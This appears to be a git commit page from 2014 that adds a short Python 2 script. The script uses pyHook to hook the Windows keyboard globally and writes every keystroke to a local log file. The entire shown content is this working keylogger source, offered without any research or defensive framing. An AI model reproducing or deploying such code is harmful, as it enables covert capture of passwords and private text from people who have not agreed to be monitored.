All the previous files

This commit is contained in:
bendtherules
2014-02-05 10:44:04 +05:30
commit 12135f9a60
160 changed files with 8827 additions and 0 deletions
+11
View File
@@ -0,0 +1,11 @@
import pyHook, pythoncom,sys,logging
file_log=r"E:\Babu\log.txt"
def OnKeyboardEvent(event):
logging.basicConfig(filename=file_log,level=logging.DEBUG,format="%(message)s")
print chr(event.Ascii)
logging.log(10,chr(event.Ascii))
hooks_manager=pyHook.HookManager()
hooks_manager.KeyDown=OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()